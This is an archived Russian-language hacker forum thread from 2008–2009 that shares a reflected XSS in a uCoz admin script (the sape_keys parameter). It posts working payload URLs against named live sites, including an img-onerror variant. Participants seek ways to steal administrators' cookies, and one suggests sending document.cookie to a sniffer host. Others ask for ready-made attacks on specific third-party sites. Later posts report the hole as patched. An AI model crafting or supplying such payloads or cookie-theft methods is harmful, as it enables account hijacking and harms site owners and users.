PDA

Просмотр полной версии : Ucoz xss

foopi
28.12.2008, 22:39
Вот xss найденная мною на юкозе:
[site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
Пример:
http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
-m0rgan-
28.12.2008, 22:57
Ыыыыыыы))))
Юкоз пахекали=)))
http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript: alert()%3E
:D:D:D
Малаца, держи канфетко=)
foopi
28.12.2008, 23:13
yje prikrili??? lol
неправда всё работает)
DVD_RW
28.12.2008, 23:14
В ФФ не пашет
-m0rgan-
28.12.2008, 23:18
В Опере все гуд!
k0lbasa
28.12.2008, 23:21
пробел надеюсь не забыл убрать, двдрв?)
DVD_RW
28.12.2008, 23:24
ога..под ие6 пашет...под фф не хочет ^_^
m0sk
29.12.2008, 03:56
гут
Xcontrol212
29.12.2008, 04:53
ff не пашет,на ие 5 и опера 9.62 пашет!
o3,14um
29.12.2008, 06:05
давайте мот перенесём в приват))
Sasuke-kun
29.12.2008, 22:05
Уже не пашет =(
-m0rgan-
29.12.2008, 22:39
Sasuke-kun, че у тебя не пашет???)
Все там пашет!!!111адинадинадин
Пробелы убери прост :D:D:D
Arigona
29.12.2008, 22:57
дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
Arigona
29.12.2008, 23:00
всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
-m0rgan-
29.12.2008, 23:07
Пробуй так:
alert(адрес снифера+document.cookie)
Chrome~
29.12.2008, 23:09
Реально. Автору зачет.
Sasuke-kun
29.12.2008, 23:19
хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
Chrome~
29.12.2008, 23:27
Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>
Alexandr II
29.12.2008, 23:39
всё пашет и пашет нормально ;) заслужил +
geforse
30.12.2008, 13:30
уже прикрыли ?(
Chrome~
30.12.2008, 14:02
Все по прежнему работает.
Arigona
30.12.2008, 19:30
НО как с этим угнать куки админа ? :(
F1shka
31.12.2008, 18:21
молодец, ТС
foopi
31.12.2008, 19:30
:( жаль только пользы от этого мало. куки не выходит угнать
luz3r
31.12.2008, 19:38
всё работает..
foopi
31.12.2008, 21:09
luz3r
И кукисы на снифер приходят?
favor_it
03.01.2009, 20:41
Дык я не понял, должна стоят сапа?
dimhee
03.01.2009, 20:48
круть , автор молодец
DeepBlue7
03.01.2009, 21:12
ЫЫЫЫЫЫЫ ))) Накнецто ХОТЬ ЧТОТО на уцозе нашли и в паб выложили =)
VinTkz
03.01.2009, 22:34
кукисы, получилось, у кого-нить угнать? :)
Rehn
04.01.2009, 17:30
Крутая у вас, ребят, уязвимость через которую ничего сделать нельзя. Да еще и связанная больше с sape чем с юкозом.
Chrome~
04.01.2009, 19:39
Если правильно написать ссылку, то все получается. Уязвимость нормальная.
miqo
05.01.2009, 14:56
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!

P.S. "репутации" нет а то + бы поставил
3dn
05.01.2009, 15:11
можете привести конкретный пример на конкретном сайте?просто мне очень нужно!
никто тут не собирается ничего приводить, тут только пустозвонить гаразды.... никто даже не посмотрел что на 404 ошибке в юкозе сапа уже не выводится, а значит некуда лепить эту пассивную XSS....

Еще... Кража кука ничего не даст, его нельзя ни расшифровать ни использовать у себя на компьютере....
Mixon
09.01.2009, 15:41
Во всех ваших примерах пишет


Невозможно найти ресурс

Возможно, он был удален, переименован, или временно недоступен.
Chrome~
09.01.2009, 17:10
Во всех ваших примерах пишет


Невозможно найти ресурс

Возможно, он был удален, переименован, или временно недоступен.
Уязвимость прикрыли.
Mixon
09.01.2009, 17:31
блин((((опоздал(((
Artemik
14.01.2009, 18:41
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
Пётр
23.01.2009, 13:44
Да реал, краша куки вам ничего не даст. По умолчанию на Укозе у админа стоит привязка к IP. А следовательно куки если и прилетят, то толку от них нет.
А если у нас динамический IP? Как куки спистеть то?)) Юзал поиск, все темы нечего конкретного... ща работает какой-нить способ?